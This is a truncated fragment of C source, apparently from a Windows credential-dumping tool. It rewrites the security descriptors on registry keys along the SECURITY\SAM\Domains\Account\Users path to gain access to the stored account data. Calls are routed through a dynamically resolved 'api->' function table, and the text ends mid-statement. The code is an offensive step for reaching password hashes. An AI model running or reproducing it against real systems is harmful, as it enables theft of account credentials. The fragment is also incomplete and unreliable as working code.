KEY_ENUMERATE_SUB_KEYS; api->plstrcpy(AdminGroupName, "Administrators"); if(!create_sd_from_list( gs, &sd, 2, "SYSTEM", GENERIC_ALL, AdminGroupName, admin_mask)) return -1; api->plstrcpy( path, "SECURITY\\SAM\\Domains\\Account\\Users"); p=path; do { while(*p!='\0') { if(*p=='\\') break; p++; } if(*p=='\0') finished=TRUE; else *p='\0'; if((err=api->pRegOpenKeyEx( start, path, 0, WRITE_DAC, &key))!=ERROR_SUCCESS) { return(security_changed ? -2: -1); } if((err=RegSetKeySecurity( key, DACL_SECURITY_INFORMATION, &sd)) != ERROR_SUCCESS) { api->pRegCloseKey(key); return(security_changed ? -2: -1); } security_changed = TRUE; api->pRegCloseKey(key); if(!finished) {*p='\\'; p++;} } while( !finished ); if(set_userkeys_security( gs, start, path, &sd, &key) != 0) return -2; if(return_key==0) api->pRegC... [truncated message content] |